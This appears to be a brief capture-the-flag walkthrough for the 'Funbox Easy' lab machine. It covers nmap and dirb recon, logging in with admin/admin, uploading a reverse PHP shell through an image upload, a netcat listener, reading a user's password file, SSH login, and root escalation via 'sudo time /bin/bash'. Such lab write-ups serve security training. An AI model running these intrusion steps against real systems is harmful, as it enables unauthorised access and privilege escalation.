Funbox Easy
RECON
Ip Search
Apache Server
Nmap Scan
nmap 192.168.54.111
Knowing Funbox Rookie not really expecting much from nmap. Dirb will be better
Dirb
dirb http:// 192.168.54.111
ENUMURATION
Admin Page
Name: admin
Pass: admin
Accepts basic admin credentials
Add New Book
Notice the image files
Create New Book
Uploading reverse PHP Shell in images
Shell Exploit
Pentest Monkey Reverse PHP
Configure the Shell
Open up a Netcat listener
nc -lvp 8000
Find shell
Running drib on the store page it appears to be using bootstrap. Check the img directory
Image Index
Privilege Escalation
Reverse Shell Opening the php lands a reverse shell
User Passwords
cd home
cd tony
cat password.txt
SSH tony
ssh tony@192.168.54.111
Password: yxcvbnmYYY
sudo -l
pkexec, time and mtr can help us escalate to root
Root Escalation
Bin Bash
sudo time /bin/bash
Root Flag
cd root
Local Flag
cd var
cd www